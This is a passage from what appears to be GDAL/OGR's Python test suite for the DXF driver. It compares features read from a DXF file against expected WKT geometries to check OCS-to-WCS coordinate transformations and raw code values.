# LINESTRING (8 -1,7.62837370825536 -0.987348067229724,7.25775889681215 -0.975707614760869,6.88916704597178 -0.966090122894857,6.52360963603567 -0.959507071933107,6.16209814730525 -0.956969942177043,5.80564406008193 -0.959490213928084,5.45525885466714 -0.968079367487651,5.11195401136229 -0.983748883157167,4.77674101046882 -1.00751024123805,4.45063133228814 -1.04037492203173,4.13463645712167 -1.08335440583961,3.82976786527082 -1.13746017296313,3.53703703703704 -1.2037037037037,3.25745545272173 -1.28309647836275,2.99203459262631 -1.37664997724169,2.74178593705221 -1.48537568064195,2.50772096630085 -1.61028506886495,2.29085116067365 -1.75238962221211,2.09218800047203 -1.91270082098484,1.91270082098485 -2.09218800047202,1.75238962221211 -2.29085116067364,1.61028506886495 -2.50772096630085,1.48537568064195 -2.74178593705221,1.37664997724169 -2.99203459262631,1.28309647836275 -3.25745545272172,1.2037037037037 -3.53703703703703,1.13746017296313 -3.82976786527082,1.08335440583961 -4.13463645712166,1.04037492203173 -4.45063133228814,1.00751024123805 -4.77674101046882,0.983748883157167 -5.11195401136229,0.968079367487652 -5.45525885466714,0.959490213928084 -5.80564406008193,0.956969942177043 -6.16209814730525,0.959507071933108 -6.52360963603567,0.966090122894857 -6.88916704597178,0.975707614760869 -7.25775889681216,0.987348067229724 -7.62837370825537,1 -8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (8 -1,7.62837370825536 -0.987348067229724,7.25775889681215 -0.975707614760869,6.88916704597178 -0.966090122894857,6.52360963603567 -0.959507071933107,6.16209814730525 -0.956969942177043,5.80564406008193 -0.959490213928084,5.45525885466714 -0.968079367487651,5.11195401136229 -0.983748883157167,4.77674101046882 -1.00751024123805,4.45063133228814 -1.04037492203173,4.13463645712167 -1.08335440583961,3.82976786527082 -1.13746017296313,3.53703703703704 -1.2037037037037,3.25745545272173 -1.28309647836275,2.99203459262631 -1.37664997724169,2.74178593705221 -1.48537568064195,2.50772096630085 -1.61028506886495,2.29085116067365 -1.75238962221211,2.09218800047203 -1.91270082098484,1.91270082098485 -2.09218800047202,1.75238962221211 -2.29085116067364,1.61028506886495 -2.50772096630085,1.48537568064195 -2.74178593705221,1.37664997724169 -2.99203459262631,1.28309647836275 -3.25745545272172,1.2037037037037 -3.53703703703703,1.13746017296313 -3.82976786527082,1.08335440583961 -4.13463645712166,1.04037492203173 -4.45063133228814,1.00751024123805 -4.77674101046882,0.983748883157167 -5.11195401136229,0.968079367487652 -5.45525885466714,0.959490213928084 -5.80564406008193,0.956969942177043 -6.16209814730525,0.959507071933108 -6.52360963603567,0.966090122894857 -6.88916704597178,0.975707614760869 -7.25775889681216,0.987348067229724 -7.62837370825537,1 -8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):51
# EntityHandle (String) = 238
# POINT Z (7 -7 -7e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (7 -7 -7e-16)'):
feat.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# OCS2WCS transformations 2. Also test RawCodeValues
def ogr_dxf_32():
gdal.SetConfigOption('DXF_INCLUDE_RAW_CODE_VALUES', 'TRUE')
ds = ogr.Open('data/ocs2wcs2.dxf')
gdal.SetConfigOption('DXF_INCLUDE_RAW_CODE_VALUES', None)
lyr = ds.GetLayer(0)
# INFO: Open of `ocs2wcs2.dxf' using driver `DXF' successful.
# OGRFeature(entities):0
# EntityHandle (String) = 1B1
# POINT Z (4 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (4 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):1
# EntityHandle (String) = 1B2
# LINESTRING Z (0 0 0,1 1 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,1 1 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):2
# EntityHandle (String) = 1B3
# LINESTRING (1 1,2 1,1 2,1 1)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (1 1,2 1,1 2,1 1)') \
or feat.GetField('RawCodeValues') != ['43 0.0']:
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):3
# EntityHandle (String) = 1B4
# LINESTRING Z (1 1 0,1 2 0,2 2 0,1 1 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1 1 0,1 2 0,2 2 0,1 1 0)') \
or feat.GetField('RawCodeValues') != ['66 1','10 0.0','20 0.0','30 0.0']:
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):4
# EntityHandle (String) = 1B9
# LINESTRING Z (6 4 0,5.99512810051965 3.86048705251175 0,5.98053613748314 3.72165379807987 0,5.95629520146761 3.58417661836448 0,5.92252339187664 3.448725288366 0,5.87938524157182 3.31595971334866 0,5.8270909152852 3.1865267138484 0,5.76589518571785 3.06105687442822 0,5.69609619231285 2.94016147153359 0,5.61803398874989 2.82442949541505 0,5.53208888623796 2.71442478062692 0,5.4386796006773 2.61068325908201 0,5.33826121271772 2.51371034904521 0,5.23132295065132 2.42397849278656 0,5.11838580694149 2.34192485488992 0,5.0 2.26794919243112 0,4.87674229357815 2.20241190740167 0,4.74921318683182 2.14563229086643 0,4.61803398874989 2.09788696740969 0,4.48384379119934 2.05940854744801 0,4.34729635533386 2.03038449397558 0,4.20905692653531 2.01095620926345 0,4.069798993405 2.00121834596181 0,3.930201006595 2.00121834596181 0,3.79094307346469 2.01095620926345 0,3.65270364466614 2.03038449397558 0,3.51615620880066 2.05940854744801 0,3.38196601125011 2.09788696740969 0,3.25078681316818 2.14563229086643 0,3.12325770642185 2.20241190740167 0,3.0 2.26794919243112 0,2.88161419305851 2.34192485488992 0,2.76867704934868 2.42397849278656 0,2.66173878728228 2.51371034904521 0,2.5613203993227 2.61068325908201 0,2.46791111376204 2.71442478062692 0,2.38196601125011 2.82442949541505 0,2.30390380768715 2.94016147153359 0,2.23410481428215 3.06105687442822 0,2.1729090847148 3.1865267138484 0,2.12061475842818 3.31595971334866 0,2.07747660812336 3.448725288366 0,2.04370479853239 3.58417661836448 0,2.01946386251686 3.72165379807987 0,2.00487189948035 3.86048705251175 0,2.0 4.0 0,2.00487189948035 4.13951294748825 0,2.01946386251686 4.27834620192013 0,2.04370479853239 4.41582338163552 0,2.07747660812336 4.551274711634 0,2.12061475842818 4.68404028665134 0,2.1729090847148 4.8134732861516 0,2.23410481428215 4.93894312557178 0,2.30390380768715 5.05983852846641 0,2.38196601125011 5.17557050458495 0,2.46791111376204 5.28557521937308 0,2.5613203993227 5.38931674091799 0,2.66173878728228 5.48628965095479 0,2.76867704934868 5.57602150721344 0,2.88161419305851 5.65807514511008 0,3.0 5.73205080756888 0,3.12325770642184 5.79758809259833 0,3.25078681316818 5.85436770913357 0,3.38196601125011 5.90211303259031 0,3.51615620880066 5.94059145255199 0,3.65270364466614 5.96961550602442 0,3.79094307346469 5.98904379073655 0,3.930201006595 5.99878165403819 0,4.069798993405 5.99878165403819 0,4.20905692653531 5.98904379073655 0,4.34729635533386 5.96961550602442 0,4.48384379119933 5.94059145255199 0,4.61803398874989 5.90211303259031 0,4.74921318683182 5.85436770913357 0,4.87674229357815 5.79758809259833 0,5.0 5.73205080756888 0,5.11838580694149 5.65807514511008 0,5.23132295065132 5.57602150721344 0,5.33826121271772 5.48628965095479 0,5.4386796006773 5.389316740918 0,5.53208888623796 5.28557521937308 0,5.61803398874989 5.17557050458495 0,5.69609619231285 5.05983852846641 0,5.76589518571785 4.93894312557178 0,5.8270909152852 4.8134732861516 0,5.87938524157182 4.68404028665134 0,5.92252339187664 4.551274711634 0,5.95629520146761 4.41582338163552 0,5.98053613748314 4.27834620192013 0,5.99512810051965 4.13951294748825 0,6.0 4.0 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (6 4 0,5.99512810051965 3.86048705251175 0,5.98053613748314 3.72165379807987 0,5.95629520146761 3.58417661836448 0,5.92252339187664 3.448725288366 0,5.87938524157182 3.31595971334866 0,5.8270909152852 3.1865267138484 0,5.76589518571785 3.06105687442822 0,5.69609619231285 2.94016147153359 0,5.61803398874989 2.82442949541505 0,5.53208888623796 2.71442478062692 0,5.4386796006773 2.61068325908201 0,5.33826121271772 2.51371034904521 0,5.23132295065132 2.42397849278656 0,5.11838580694149 2.34192485488992 0,5.0 2.26794919243112 0,4.87674229357815 2.20241190740167 0,4.74921318683182 2.14563229086643 0,4.61803398874989 2.09788696740969 0,4.48384379119934 2.05940854744801 0,4.34729635533386 2.03038449397558 0,4.20905692653531 2.01095620926345 0,4.069798993405 2.00121834596181 0,3.930201006595 2.00121834596181 0,3.79094307346469 2.01095620926345 0,3.65270364466614 2.03038449397558 0,3.51615620880066 2.05940854744801 0,3.38196601125011 2.09788696740969 0,3.25078681316818 2.14563229086643 0,3.12325770642185 2.20241190740167 0,3.0 2.26794919243112 0,2.88161419305851 2.34192485488992 0,2.76867704934868 2.42397849278656 0,2.66173878728228 2.51371034904521 0,2.5613203993227 2.61068325908201 0,2.46791111376204 2.71442478062692 0,2.38196601125011 2.82442949541505 0,2.30390380768715 2.94016147153359 0,2.23410481428215 3.06105687442822 0,2.1729090847148 3.1865267138484 0,2.12061475842818 3.31595971334866 0,2.07747660812336 3.448725288366 0,2.04370479853239 3.58417661836448 0,2.01946386251686 3.72165379807987 0,2.00487189948035 3.86048705251175 0,2.0 4.0 0,2.00487189948035 4.13951294748825 0,2.01946386251686 4.27834620192013 0,2.04370479853239 4.41582338163552 0,2.07747660812336 4.551274711634 0,2.12061475842818 4.68404028665134 0,2.1729090847148 4.8134732861516 0,2.23410481428215 4.93894312557178 0,2.30390380768715 5.05983852846641 0,2.38196601125011 5.17557050458495 0,2.46791111376204 5.28557521937308 0,2.5613203993227 5.38931674091799 0,2.66173878728228 5.48628965095479 0,2.76867704934868 5.57602150721344 0,2.88161419305851 5.65807514511008 0,3.0 5.73205080756888 0,3.12325770642184 5.79758809259833 0,3.25078681316818 5.85436770913357 0,3.38196601125011 5.90211303259031 0,3.51615620880066 5.94059145255199 0,3.65270364466614 5.96961550602442 0,3.79094307346469 5.98904379073655 0,3.930201006595 5.99878165403819 0,4.069798993405 5.99878165403819 0,4.20905692653531 5.98904379073655 0,4.34729635533386 5.96961550602442 0,4.48384379119933 5.94059145255199 0,4.61803398874989 5.90211303259031 0,4.74921318683182 5.85436770913357 0,4.87674229357815 5.79758809259833 0,5.0 5.73205080756888 0,5.11838580694149 5.65807514511008 0,5.23132295065132 5.57602150721344 0,5.33826121271772 5.48628965095479 0,5.4386796006773 5.389316740918 0,5.53208888623796 5.28557521937308 0,5.61803398874989 5.17557050458495 0,5.69609619231285 5.05983852846641 0,5.76589518571785 4.93894312557178 0,5.8270909152852 4.8134732861516 0,5.87938524157182 4.68404028665134 0,5.92252339187664 4.551274711634 0,5.95629520146761 4.41582338163552 0,5.98053613748314 4.27834620192013 0,5.99512810051965 4.13951294748825 0,6.0 4.0 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):5
# EntityHandle (String) = 1BA
# LINESTRING Z (2 4 0,4 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2 4 0,4 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):6
# EntityHandle (String) = 1BB
# LINESTRING Z (4 4 0,6 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (4 4 0,6 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):7
# EntityHandle (String) = 1BC
# LINESTRING Z (4 3 0,4 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (4 3 0,4 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):8
# EntityHandle (String) = 1BD
# LINESTRING Z (4 4 0,4 5 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (4 4 0,4 5 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):9
# EntityHandle (String) = 1BE
# LINESTRING Z (2 4 0,2.00487189948035 4.06975647374412 0,2.01946386251686 4.13917310096007 0,2.04370479853239 4.20791169081776 0,2.07747660812336 4.275637355817 0,2.12061475842818 4.34202014332567 0,2.1729090847148 4.4067366430758 0,2.23410481428215 4.46947156278589 0,2.30390380768715 4.52991926423321 0,2.38196601125011 4.58778525229247 0,2.46791111376204 4.64278760968654 0,2.5613203993227 4.694658370459 0,2.66173878728228 4.74314482547739 0,2.76867704934868 4.78801075360672 0,2.88161419305851 4.82903757255504 0,3.0 4.86602540378444 0,3.12325770642185 4.89879404629917 0,3.25078681316818 4.92718385456679 0,3.38196601125011 4.95105651629515 0,3.51615620880067 4.970295726276 0,3.65270364466614 4.98480775301221 0,3.79094307346469 4.99452189536827 0,3.930201006595 4.9993908270191 0,4.069798993405 4.9993908270191 0,4.20905692653531 4.99452189536827 0,4.34729635533386 4.98480775301221 0,4.48384379119934 4.970295726276 0,4.61803398874989 4.95105651629515 0,4.74921318683182 4.92718385456679 0,4.87674229357816 4.89879404629917 0,5.0 4.86602540378444 0,5.11838580694149 4.82903757255504 0,5.23132295065132 4.78801075360672 0,5.33826121271772 4.74314482547739 0,5.4386796006773 4.694658370459 0,5.53208888623796 4.64278760968654 0,5.61803398874989 4.58778525229247 0,5.69609619231285 4.5299192642332 0,5.76589518571785 4.46947156278589 0,5.8270909152852 4.4067366430758 0,5.87938524157182 4.34202014332567 0,5.92252339187664 4.275637355817 0,5.95629520146761 4.20791169081776 0,5.98053613748314 4.13917310096006 0,5.99512810051965 4.06975647374412 0,6.0 4.0 0,5.99512810051965 3.93024352625587 0,5.98053613748314 3.86082689903993 0,5.95629520146761 3.79208830918224 0,5.92252339187664 3.724362644183 0,5.87938524157182 3.65797985667433 0,5.8270909152852 3.5932633569242 0,5.76589518571785 3.53052843721411 0,5.69609619231285 3.4700807357668 0,5.61803398874989 3.41221474770753 0,5.53208888623796 3.35721239031346 0,5.4386796006773 3.305341629541 0,5.33826121271772 3.25685517452261 0,5.23132295065132 3.21198924639328 0,5.11838580694149 3.17096242744496 0,5.0 3.13397459621556 0,4.87674229357815 3.10120595370083 0,4.74921318683182 3.07281614543321 0,4.61803398874989 3.04894348370485 0,4.48384379119934 3.029704273724 0,4.34729635533386 3.01519224698779 0,4.20905692653531 3.00547810463173 0,4.069798993405 3.0006091729809 0,3.930201006595 3.0006091729809 0,3.79094307346469 3.00547810463173 0,3.65270364466614 3.01519224698779 0,3.51615620880066 3.029704273724 0,3.38196601125011 3.04894348370485 0,3.25078681316818 3.07281614543321 0,3.12325770642185 3.10120595370083 0,3.0 3.13397459621556 0,2.88161419305851 3.17096242744496 0,2.76867704934868 3.21198924639328 0,2.66173878728228 3.25685517452261 0,2.5613203993227 3.305341629541 0,2.46791111376204 3.35721239031346 0,2.38196601125011 3.41221474770753 0,2.30390380768715 3.4700807357668 0,2.23410481428215 3.53052843721411 0,2.1729090847148 3.5932633569242 0,2.12061475842818 3.65797985667433 0,2.07747660812336 3.724362644183 0,2.04370479853239 3.79208830918224 0,2.01946386251686 3.86082689903993 0,2.00487189948035 3.93024352625587 0,2 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2 4 0,2.00487189948035 4.06975647374412 0,2.01946386251686 4.13917310096007 0,2.04370479853239 4.20791169081776 0,2.07747660812336 4.275637355817 0,2.12061475842818 4.34202014332567 0,2.1729090847148 4.4067366430758 0,2.23410481428215 4.46947156278589 0,2.30390380768715 4.52991926423321 0,2.38196601125011 4.58778525229247 0,2.46791111376204 4.64278760968654 0,2.5613203993227 4.694658370459 0,2.66173878728228 4.74314482547739 0,2.76867704934868 4.78801075360672 0,2.88161419305851 4.82903757255504 0,3.0 4.86602540378444 0,3.12325770642185 4.89879404629917 0,3.25078681316818 4.92718385456679 0,3.38196601125011 4.95105651629515 0,3.51615620880067 4.970295726276 0,3.65270364466614 4.98480775301221 0,3.79094307346469 4.99452189536827 0,3.930201006595 4.9993908270191 0,4.069798993405 4.9993908270191 0,4.20905692653531 4.99452189536827 0,4.34729635533386 4.98480775301221 0,4.48384379119934 4.970295726276 0,4.61803398874989 4.95105651629515 0,4.74921318683182 4.92718385456679 0,4.87674229357816 4.89879404629917 0,5.0 4.86602540378444 0,5.11838580694149 4.82903757255504 0,5.23132295065132 4.78801075360672 0,5.33826121271772 4.74314482547739 0,5.4386796006773 4.694658370459 0,5.53208888623796 4.64278760968654 0,5.61803398874989 4.58778525229247 0,5.69609619231285 4.5299192642332 0,5.76589518571785 4.46947156278589 0,5.8270909152852 4.4067366430758 0,5.87938524157182 4.34202014332567 0,5.92252339187664 4.275637355817 0,5.95629520146761 4.20791169081776 0,5.98053613748314 4.13917310096006 0,5.99512810051965 4.06975647374412 0,6.0 4.0 0,5.99512810051965 3.93024352625587 0,5.98053613748314 3.86082689903993 0,5.95629520146761 3.79208830918224 0,5.92252339187664 3.724362644183 0,5.87938524157182 3.65797985667433 0,5.8270909152852 3.5932633569242 0,5.76589518571785 3.53052843721411 0,5.69609619231285 3.4700807357668 0,5.61803398874989 3.41221474770753 0,5.53208888623796 3.35721239031346 0,5.4386796006773 3.305341629541 0,5.33826121271772 3.25685517452261 0,5.23132295065132 3.21198924639328 0,5.11838580694149 3.17096242744496 0,5.0 3.13397459621556 0,4.87674229357815 3.10120595370083 0,4.74921318683182 3.07281614543321 0,4.61803398874989 3.04894348370485 0,4.48384379119934 3.029704273724 0,4.34729635533386 3.01519224698779 0,4.20905692653531 3.00547810463173 0,4.069798993405 3.0006091729809 0,3.930201006595 3.0006091729809 0,3.79094307346469 3.00547810463173 0,3.65270364466614 3.01519224698779 0,3.51615620880066 3.029704273724 0,3.38196601125011 3.04894348370485 0,3.25078681316818 3.07281614543321 0,3.12325770642185 3.10120595370083 0,3.0 3.13397459621556 0,2.88161419305851 3.17096242744496 0,2.76867704934868 3.21198924639328 0,2.66173878728228 3.25685517452261 0,2.5613203993227 3.305341629541 0,2.46791111376204 3.35721239031346 0,2.38196601125011 3.41221474770753 0,2.30390380768715 3.4700807357668 0,2.23410481428215 3.53052843721411 0,2.1729090847148 3.5932633569242 0,2.12061475842818 3.65797985667433 0,2.07747660812336 3.724362644183 0,2.04370479853239 3.79208830918224 0,2.01946386251686 3.86082689903993 0,2.00487189948035 3.93024352625587 0,2 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):10
# EntityHandle (String) = 1BF
# LINESTRING Z (2.0 2.0 0,1.96657794502105 2.03582232791524 0,1.93571660708646 2.07387296203834 0,1.90756413746468 2.11396923855471 0,1.88225568337755 2.15591867344963 0,1.85991273921989 2.19951988653655 0,1.84064256332004 2.24456356819194 0,1.8245376630414 2.29083348415575 0,1.81167535069652 2.33810751357387 0,1.80211737240583 2.38615871529951 0,1.79590961168258 2.43475641733454 0,1.79308186916688 2.48366732418105 0,1.79364771956639 2.53265663678705 0,1.79760444649032 2.58148917971011 0,1.80493305548955 2.62993053008785 0,1.81559836524041 2.67774814299566 0,1.8295491764342 2.72471246778926 0,1.84671851756181 2.7705980500731 0,1.86702396641357 2.81518461400453 0,1.89036804575079 2.85825811973811 0,1.91663869124976 2.89961179093366 0,1.94570978947168 2.93904710739563 0,1.97744178327594 2.97637475807832 0,2.01168234177068 3.01141554988232 0,2.04826709158413 3.04400126787917 0,2.08702040594658 3.07397548283483 0,2.12775624779472 3.10119430215541 0,2.17027906285109 3.12552706065018 0,2.2143847183914 3.14685694779575 0,2.25986148319297 3.16508156849045 0,2.30649104396024 3.18011343460661 0,2.35404955334774 3.1918803849814 0,2.40230870454951 3.20032593182975 0,2.45103682729644 3.2054095319166 0,2.5 3.20710678118655 0,2.54896317270356 3.2054095319166 0,2.59769129545049 3.20032593182975 0,2.64595044665226 3.1918803849814 0,2.69350895603976 3.18011343460661 0,2.74013851680703 3.16508156849045 0,2.7856152816086 3.14685694779575 0,2.8297209371489 3.12552706065018 0,2.87224375220528 3.10119430215541 0,2.91297959405342 3.07397548283483 0,2.95173290841587 3.04400126787917 0,2.98831765822932 3.01141554988232 0,3.02255821672406 2.97637475807832 0,3.05429021052832 2.93904710739563 0,3.08336130875024 2.89961179093367 0,3.10963195424921 2.85825811973811 0,3.13297603358643 2.81518461400453 0,3.15328148243819 2.7705980500731 0,3.1704508235658 2.72471246778926 0,3.18440163475959 2.67774814299567 0,3.19506694451045 2.62993053008786 0,3.20239555350968 2.58148917971011 0,3.20635228043361 2.53265663678705 0,3.20691813083312 2.48366732418105 0,3.20409038831742 2.43475641733454 0,3.19788262759417 2.38615871529951 0,3.18832464930348 2.33810751357387 0,3.1754623369586 2.29083348415575 0,3.15935743667996 2.24456356819194 0,3.14008726078011 2.19951988653655 0,3.11774431662245 2.15591867344963 0,3.09243586253532 2.11396923855472 0,3.06428339291354 2.07387296203834 0,3.03342205497895 2.03582232791524 0,3 2 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2.0 2.0 0,1.96657794502105 2.03582232791524 0,1.93571660708646 2.07387296203834 0,1.90756413746468 2.11396923855471 0,1.88225568337755 2.15591867344963 0,1.85991273921989 2.19951988653655 0,1.84064256332004 2.24456356819194 0,1.8245376630414 2.29083348415575 0,1.81167535069652 2.33810751357387 0,1.80211737240583 2.38615871529951 0,1.79590961168258 2.43475641733454 0,1.79308186916688 2.48366732418105 0,1.79364771956639 2.53265663678705 0,1.79760444649032 2.58148917971011 0,1.80493305548955 2.62993053008785 0,1.81559836524041 2.67774814299566 0,1.8295491764342 2.72471246778926 0,1.84671851756181 2.7705980500731 0,1.86702396641357 2.81518461400453 0,1.89036804575079 2.85825811973811 0,1.91663869124976 2.89961179093366 0,1.94570978947168 2.93904710739563 0,1.97744178327594 2.97637475807832 0,2.01168234177068 3.01141554988232 0,2.04826709158413 3.04400126787917 0,2.08702040594658 3.07397548283483 0,2.12775624779472 3.10119430215541 0,2.17027906285109 3.12552706065018 0,2.2143847183914 3.14685694779575 0,2.25986148319297 3.16508156849045 0,2.30649104396024 3.18011343460661 0,2.35404955334774 3.1918803849814 0,2.40230870454951 3.20032593182975 0,2.45103682729644 3.2054095319166 0,2.5 3.20710678118655 0,2.54896317270356 3.2054095319166 0,2.59769129545049 3.20032593182975 0,2.64595044665226 3.1918803849814 0,2.69350895603976 3.18011343460661 0,2.74013851680703 3.16508156849045 0,2.7856152816086 3.14685694779575 0,2.8297209371489 3.12552706065018 0,2.87224375220528 3.10119430215541 0,2.91297959405342 3.07397548283483 0,2.95173290841587 3.04400126787917 0,2.98831765822932 3.01141554988232 0,3.02255821672406 2.97637475807832 0,3.05429021052832 2.93904710739563 0,3.08336130875024 2.89961179093367 0,3.10963195424921 2.85825811973811 0,3.13297603358643 2.81518461400453 0,3.15328148243819 2.7705980500731 0,3.1704508235658 2.72471246778926 0,3.18440163475959 2.67774814299567 0,3.19506694451045 2.62993053008786 0,3.20239555350968 2.58148917971011 0,3.20635228043361 2.53265663678705 0,3.20691813083312 2.48366732418105 0,3.20409038831742 2.43475641733454 0,3.19788262759417 2.38615871529951 0,3.18832464930348 2.33810751357387 0,3.1754623369586 2.29083348415575 0,3.15935743667996 2.24456356819194 0,3.14008726078011 2.19951988653655 0,3.11774431662245 2.15591867344963 0,3.09243586253532 2.11396923855472 0,3.06428339291354 2.07387296203834 0,3.03342205497895 2.03582232791524 0,3 2 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):11
# EntityHandle (String) = 1C0
# POLYGON Z ((1 2 0,1 3 0,2 3 0,2 2 0,1 2 0))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((1 2 0,1 3 0,2 3 0,2 2 0,1 2 0))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):12
# EntityHandle (String) = 1C1
# POLYGON ((3 4,4 4,4 3,3 3,3 4))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((3 4,4 4,4 3,3 3,3 4))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):13
# EntityHandle (String) = 1C3
# POLYGON ((8 8,9 8,9 9,8 9,8 8))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((8 8,9 8,9 9,8 9,8 8))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):14
# EntityHandle (String) = 1C6
# LINESTRING (2 2,2.15384615384615 2.15384615384615,2.30769230769231 2.30769230769231,2.46153846153846 2.46153846153846,2.61538461538461 2.61538461538461,2.76923076923077 2.76923076923077,2.92307692307692 2.92307692307692,3.07692307692308 3.07692307692308,3.23076923076923 3.23076923076923,3.38461538461538 3.38461538461538,3.53846153846154 3.53846153846154,3.69230769230769 3.69230769230769,3.84615384615385 3.84615384615385,4 4,4.15384615384615 4.15384615384615,4.30769230769231 4.30769230769231,4.46153846153846 4.46153846153846,4.61538461538462 4.61538461538462,4.76923076923077 4.76923076923077,4.92307692307692 4.92307692307692,5.07692307692308 5.07692307692308,5.23076923076923 5.23076923076923,5.38461538461538 5.38461538461538,5.53846153846154 5.53846153846154,5.69230769230769 5.69230769230769,5.84615384615385 5.84615384615385,6.0 6.0,6.15384615384615 6.15384615384615,6.30769230769231 6.30769230769231,6.46153846153846 6.46153846153846,6.61538461538462 6.61538461538462,6.76923076923077 6.76923076923077,6.92307692307692 6.92307692307692,7.07692307692308 7.07692307692308,7.23076923076923 7.23076923076923,7.38461538461539 7.38461538461539,7.53846153846154 7.53846153846154,7.69230769230769 7.69230769230769,7.84615384615385 7.84615384615385,8 8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (2 2,2.15384615384615 2.15384615384615,2.30769230769231 2.30769230769231,2.46153846153846 2.46153846153846,2.61538461538461 2.61538461538461,2.76923076923077 2.76923076923077,2.92307692307692 2.92307692307692,3.07692307692308 3.07692307692308,3.23076923076923 3.23076923076923,3.38461538461538 3.38461538461538,3.53846153846154 3.53846153846154,3.69230769230769 3.69230769230769,3.84615384615385 3.84615384615385,4 4,4.15384615384615 4.15384615384615,4.30769230769231 4.30769230769231,4.46153846153846 4.46153846153846,4.61538461538462 4.61538461538462,4.76923076923077 4.76923076923077,4.92307692307692 4.92307692307692,5.07692307692308 5.07692307692308,5.23076923076923 5.23076923076923,5.38461538461538 5.38461538461538,5.53846153846154 5.53846153846154,5.69230769230769 5.69230769230769,5.84615384615385 5.84615384615385,6.0 6.0,6.15384615384615 6.15384615384615,6.30769230769231 6.30769230769231,6.46153846153846 6.46153846153846,6.61538461538462 6.61538461538462,6.76923076923077 6.76923076923077,6.92307692307692 6.92307692307692,7.07692307692308 7.07692307692308,7.23076923076923 7.23076923076923,7.38461538461539 7.38461538461539,7.53846153846154 7.53846153846154,7.69230769230769 7.69230769230769,7.84615384615385 7.84615384615385,8 8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):15
# EntityHandle (String) = 1C7
# LINESTRING (8 1,7.62837370825536 0.987348067229724,7.25775889681215 0.975707614760869,6.88916704597178 0.966090122894857,6.52360963603567 0.959507071933107,6.16209814730525 0.956969942177043,5.80564406008193 0.959490213928084,5.45525885466714 0.968079367487651,5.11195401136229 0.983748883157167,4.77674101046882 1.00751024123805,4.45063133228814 1.04037492203173,4.13463645712167 1.08335440583961,3.82976786527082 1.13746017296313,3.53703703703704 1.2037037037037,3.25745545272173 1.28309647836275,2.99203459262631 1.37664997724169,2.74178593705221 1.48537568064195,2.50772096630085 1.61028506886495,2.29085116067365 1.75238962221211,2.09218800047203 1.91270082098484,1.91270082098485 2.09218800047202,1.75238962221211 2.29085116067364,1.61028506886495 2.50772096630085,1.48537568064195 2.74178593705221,1.37664997724169 2.99203459262631,1.28309647836275 3.25745545272172,1.2037037037037 3.53703703703703,1.13746017296313 3.82976786527082,1.08335440583961 4.13463645712166,1.04037492203173 4.45063133228814,1.00751024123805 4.77674101046882,0.983748883157167 5.11195401136229,0.968079367487652 5.45525885466714,0.959490213928084 5.80564406008193,0.956969942177043 6.16209814730525,0.959507071933108 6.52360963603567,0.966090122894857 6.88916704597178,0.975707614760869 7.25775889681216,0.987348067229724 7.62837370825537,1 8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (8 1,7.62837370825536 0.987348067229724,7.25775889681215 0.975707614760869,6.88916704597178 0.966090122894857,6.52360963603567 0.959507071933107,6.16209814730525 0.956969942177043,5.80564406008193 0.959490213928084,5.45525885466714 0.968079367487651,5.11195401136229 0.983748883157167,4.77674101046882 1.00751024123805,4.45063133228814 1.04037492203173,4.13463645712167 1.08335440583961,3.82976786527082 1.13746017296313,3.53703703703704 1.2037037037037,3.25745545272173 1.28309647836275,2.99203459262631 1.37664997724169,2.74178593705221 1.48537568064195,2.50772096630085 1.61028506886495,2.29085116067365 1.75238962221211,2.09218800047203 1.91270082098484,1.91270082098485 2.09218800047202,1.75238962221211 2.29085116067364,1.61028506886495 2.50772096630085,1.48537568064195 2.74178593705221,1.37664997724169 2.99203459262631,1.28309647836275 3.25745545272172,1.2037037037037 3.53703703703703,1.13746017296313 3.82976786527082,1.08335440583961 4.13463645712166,1.04037492203173 4.45063133228814,1.00751024123805 4.77674101046882,0.983748883157167 5.11195401136229,0.968079367487652 5.45525885466714,0.959490213928084 5.80564406008193,0.956969942177043 6.16209814730525,0.959507071933108 6.52360963603567,0.966090122894857 6.88916704597178,0.975707614760869 7.25775889681216,0.987348067229724 7.62837370825537,1 8)'):
feat.DumpReadable()
